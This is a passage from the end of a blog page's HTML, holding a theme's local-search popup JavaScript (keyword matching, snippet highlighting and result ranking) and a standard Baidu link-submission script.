            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

  

</body>
</html>
